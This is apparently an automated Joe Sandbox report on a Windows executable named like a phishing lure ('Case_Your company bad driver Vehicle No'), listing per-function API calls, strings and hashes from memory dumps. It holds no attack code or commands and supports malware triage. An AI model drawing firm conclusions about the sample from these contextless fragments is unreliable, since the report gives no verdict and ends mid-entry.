Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 43c5dc376ad9f69f89f1629eb3ec99a52121f7863fc96a0a3dc3a11f80dd2485
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 4371A371A44756ABD7149E69CC82BAAF3E8EF11720F1442ABF514E73C1FB70D9408790

Uniqueness

Uniqueness Score: -1.00%

Function 00C12A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12A31
GetMenuItemInfoW.USER32(00C76890,000000FF,00000000,00000030), ref: 00C12A92
SetMenuItemInfoW.USER32(00C76890,00000004,00000000,00000030), ref: 00C12AC8
Sleep.KERNEL32(000001F4), ref: 00C12ADA
GetMenuItemCount.USER32(?), ref: 00C12B1E
GetMenuItemID.USER32(?,00000000), ref: 00C12B3A
GetMenuItemID.USER32(?,-00000001), ref: 00C12B64
GetMenuItemID.USER32(?,?), ref: 00C12BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C12BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12C24

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 46e76455af40ad4de50ec5d270571cef6568fa0cc2ca5064da678cc5b0308ae5
Instruction ID: b510bcd67ab1f0a16d8120266231b78b437e75a026b56d5cbda73c8cea93c178
Opcode Fuzzy Hash: 46e76455af40ad4de50ec5d270571cef6568fa0cc2ca5064da678cc5b0308ae5
Instruction Fuzzy Hash: 0561A2B8904249AFDB11CF64DC98FEE7BB8FB02304F144459F95293251D731AEA6EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C37192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C37214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C37217
GetWindowLongW.USER32(?,000000F0), ref: 00C3723B
_memset.LIBCMT ref: 00C3724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C3725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C372D6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 551707febc0cc1fc23cda80b976f4718b144a6375eef0c807ac0546c864f8e02
Instruction ID: e12a492e13edd7ec834524028e98187a99bd7d29991baafd5f1523607cb8c5e3
Opcode Fuzzy Hash: 551707febc0cc1fc23cda80b976f4718b144a6375eef0c807ac0546c864f8e02
Instruction Fuzzy Hash: 6E615BB5900248AFDB20DFA4CC81FEE77F8EB09710F144259FA14A72A1D774AE45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C0710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C07135
SafeArrayAllocData.OLEAUT32(?), ref: 00C0718E
VariantInit.OLEAUT32(?), ref: 00C071A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C071C0
VariantCopy.OLEAUT32(?,?), ref: 00C07213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C07227
VariantClear.OLEAUT32(?), ref: 00C0723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00C07249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C07252
VariantClear.OLEAUT32(?), ref: 00C07264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C0726F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 1f767e2de387d830331d199325f80b368c04c94fddfa6bff12b4392375e2bf2e
Instruction ID: 51192fbf0b2190948c72c03dc84183485b91f80aa23f675e78ebd9103ed15c2b
Opcode Fuzzy Hash: 1f767e2de387d830331d199325f80b368c04c94fddfa6bff12b4392375e2bf2e
Instruction Fuzzy Hash: F5415135D04119EFCF04DF64D848AAEBBB9FF48354F008569F955A7261CB70EA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C25A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C25AA6
inet_addr.WSOCK32(?,?,?), ref: 00C25AEB
gethostbyname.WSOCK32(?), ref: 00C25AF7
IcmpCreateFile.IPHLPAPI ref: 00C25B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C25B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C25B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C25C00
WSACleanup.WSOCK32 ref: 00C25C06

Strings

Ping, xrefs: 00C25B29

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1c0f7f91ef4172e58627becb1a95beefae8b504df64b66bbf3382598b61f0c23
Instruction ID: 48f345eea88cfe26c49571c3dcf0a4cc2e0ff74c3af70a8317130a0f5fbd5105
Opcode Fuzzy Hash: 1c0f7f91ef4172e58627becb1a95beefae8b504df64b66bbf3382598b61f0c23
Instruction Fuzzy Hash: F9519D316047109FDB21AF25EC45B6FBBE4EF48710F148969F56ADB2A1DB70E900DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C1B7B1
GetLastError.KERNEL32 ref: 00C1B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00C1B828

Strings

READY, xrefs: 00C1B801
UNKNOWN, xrefs: 00C1B7E0
READONLY, xrefs: 00C1B7F3
INVALID, xrefs: 00C1B7FA
NOTREADY, xrefs: 00C1B7E7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 38ac7ab855154ae656ac88f2dd1bfe1f719f5d7729dab3e73c43ad0830395f82
Instruction ID: be0b04710d7a3d02072eb3d546539cc3021bf260c203d8e88a27a960a4696f66
Opcode Fuzzy Hash: 38ac7ab855154ae656ac88f2dd1bfe1f719f5d7729dab3e73c43ad0830395f82
Instruction Fuzzy Hash: 19315E35A002059FDB10EF64C885AFE77B8EF8A710F144069E515A72D1DB719E82EE91

Uniqueness

Uniqueness Score: -1.00%

Function 00C09471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C094F6
GetDlgCtrlID.USER32 ref: 00C09501
GetParent.USER32 ref: 00C0951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C09520
GetDlgCtrlID.USER32(?), ref: 00C09529
GetParent.USER32(?), ref: 00C09545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C09548

Strings

ComboBox, xrefs: 00C0947E
ListBox, xrefs: 00C094B3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f2d14de9b7ce32e09cd1e85f7c5cdae65b082dbd32b0a31c85afb6c99f8121e1
Instruction ID: 38a2854d1dfd40885b1a95036df732b8b45f943503099622d84716b08da81f84
Opcode Fuzzy Hash: f2d14de9b7ce32e09cd1e85f7c5cdae65b082dbd32b0a31c85afb6c99f8121e1
Instruction Fuzzy Hash: 4F218374D00108ABCF05ABA5CC95FFEB7B8EF45310F104169F561572E2DB755919DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C0955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C095DF
GetDlgCtrlID.USER32 ref: 00C095EA
GetParent.USER32 ref: 00C09606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C09609
GetDlgCtrlID.USER32(?), ref: 00C09612
GetParent.USER32(?), ref: 00C0962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C09631

Strings

ComboBox, xrefs: 00C09569
ListBox, xrefs: 00C0959E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 9b80990409c7f9556af670443003517e15340edb2b1ab8542a8ad0c800855c2b
Instruction ID: 1eea01dc7c11a4af9a2beefb7ed41c36b96e95f5e4aa08639f44ee6b4722bd21
Opcode Fuzzy Hash: 9b80990409c7f9556af670443003517e15340edb2b1ab8542a8ad0c800855c2b
Instruction Fuzzy Hash: AC216074900208ABDF15AB61CCD6FFEBBB8EB48300F104559F961972E2DB759919DA20

Uniqueness

Uniqueness Score: -1.00%

Function 00C09645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C09651
GetClassNameW.USER32(00000000,?,00000100), ref: 00C09666
_wcscmp.LIBCMT ref: 00C09678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C096F3

Strings

SHELLDLL_DefView, xrefs: 00C09672
details, xrefs: 00C096A1
list, xrefs: 00C096D5
largeicons, xrefs: 00C09687
smallicons, xrefs: 00C096BB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 10a195ad3353f0b2f783e5e892bc11256e6dd1213588ce15ed270d6c9ea8c3ff
Instruction ID: fe1f63022be1629464fc05938d37fc207687a1568bb47fb36f66ebdd862ce0ff
Opcode Fuzzy Hash: 10a195ad3353f0b2f783e5e892bc11256e6dd1213588ce15ed270d6c9ea8c3ff
Instruction Fuzzy Hash: DE115936248717BAFA112621DC07FA6B7DCCB01720F20012BF911A00E3FEB36A01C949

Uniqueness

Uniqueness Score: -1.00%

Function 00C28BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C28BEC
CoInitialize.OLE32(00000000), ref: 00C28C19
CoUninitialize.OLE32 ref: 00C28C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00C28D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C28E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C42C0C), ref: 00C28E84
CoGetObject.OLE32(?,00000000,00C42C0C,?), ref: 00C28EA7
SetErrorMode.KERNEL32(00000000), ref: 00C28EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C28F3A
VariantClear.OLEAUT32(?), ref: 00C28F4A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 5147fd2eccd3b1fa4774e1020e9045ae1fffe0fa6776cb278c924b95601bb1f6
Instruction ID: 03dfa8af76837de6ba5abb979f1baa4fc92b06f1898c26225619a2adf51114ce
Opcode Fuzzy Hash: 5147fd2eccd3b1fa4774e1020e9045ae1fffe0fa6776cb278c924b95601bb1f6
Instruction Fuzzy Hash: F0C14671604315AFD700DF68D884A2BB7E9FF89348F00496DF5899B261DB71ED0ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C14189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C1419D
__swprintf.LIBCMT ref: 00C141AA

Part of subcall function 00BD38D8: __woutput_l.LIBCMT ref: 00BD3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00C141D4
LoadResource.KERNEL32(?,00000000), ref: 00C141E0
LockResource.KERNEL32(00000000), ref: 00C141ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00C1420D
LoadResource.KERNEL32(?,00000000), ref: 00C1421F
SizeofResource.KERNEL32(?,00000000), ref: 00C1422E
LockResource.KERNEL32(?), ref: 00C1423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C1429B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 665b2b518a5a1853fb942a5525affbbbdc47975d8d9e226a442c69a71da2dd9f
Instruction ID: a6726d88ab176eb3c8561fe9d935832ebd4ac62a37814f557f9d7e4d90f69c20
Opcode Fuzzy Hash: 665b2b518a5a1853fb942a5525affbbbdc47975d8d9e226a442c69a71da2dd9f
Instruction Fuzzy Hash: 77319F71A0120AABCB199F61DC48FFF7BA8EF05301F10492AF815D2150E771DA92DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C116DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C11700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C10778,?,00000001), ref: 00C11714
GetWindowThreadProcessId.USER32(00000000), ref: 00C1171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10778,?,00000001), ref: 00C1172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10778,?,00000001), ref: 00C11755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C10778,?,00000001), ref: 00C11767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C10778,?,00000001), ref: 00C117AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C10778,?,00000001), ref: 00C117C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C10778,?,00000001), ref: 00C117CC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: fe1ae9e5a6f61ab55e2d4d99200f7e9b757930d87cccd585ced03e3678b8fb96
Instruction ID: f30a405a2f3cab6e1610ac2e4018f04d68bf5c6ac3a1c07ad5b8021bfcdbaacb
Opcode Fuzzy Hash: fe1ae9e5a6f61ab55e2d4d99200f7e9b757930d87cccd585ced03e3678b8fb96
Instruction Fuzzy Hash: 5631CE71604209ABEB119F50DD88FAD3BA9EB06711F154428FE08C63E0D7789EC0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBFBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BBFC06
OleUninitialize.OLE32(?,00000000), ref: 00BBFCA5
UnregisterHotKey.USER32(?), ref: 00BBFDFC
DestroyWindow.USER32(?), ref: 00BF4A00
FreeLibrary.KERNEL32(?), ref: 00BF4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BF4A92

Strings

close all, xrefs: 00BBFC01

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: dcdcbda494832314e4b6a592d26884b07f8ca87e5f2582d9575685d9c417c810
Instruction ID: 97790605626c8bfc815e16c89f7a4b49a2ce56ffe10b64fd816bded042804b36
Opcode Fuzzy Hash: dcdcbda494832314e4b6a592d26884b07f8ca87e5f2582d9575685d9c417c810
Instruction Fuzzy Hash: 48A128347012168FCB29EF14C995BBAF7A4EF05700F1442EDE90AAB262DB70AD56CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C0A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C0AA64), ref: 00C0A9A2

Strings

TEXT, xrefs: 00C0A8D9
CLASS, xrefs: 00C0A721
CLASSNN, xrefs: 00C0A744
REGEXPCLASS, xrefs: 00C0A767
NAME, xrefs: 00C0A7D4
INSTANCE, xrefs: 00C0A8B0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 8df73a9adfaf50b3d404a9f12338e76cb6214cdc87051f30b3143b708c7700f9
Instruction ID: 1bc49904c1da96416ccf6ee621bf8b26fb09f7bc21c0c02cd78e52ed496a624b
Opcode Fuzzy Hash: 8df73a9adfaf50b3d404a9f12338e76cb6214cdc87051f30b3143b708c7700f9
Instruction Fuzzy Hash: 90917470A00706ABDF58DF60C481BE9FBB5BF04304F14816AE959A72D1DF30AA59DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00BB2EAE

Part of subcall function 00BB1DB3: GetClientRect.USER32(?,?), ref: 00BB1DDC
Part of subcall function 00BB1DB3: GetWindowRect.USER32(?,?), ref: 00BB1E1D
Part of subcall function 00BB1DB3: ScreenToClient.USER32(?,?), ref: 00BB1E45

GetDC.USER32 ref: 00BECF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BECF95
SelectObject.GDI32(00000000,00000000), ref: 00BECFA3
SelectObject.GDI32(00000000,00000000), ref: 00BECFB8
ReleaseDC.USER32(?,00000000), ref: 00BECFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00BED04B

Strings

U, xrefs: 00BECF20

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
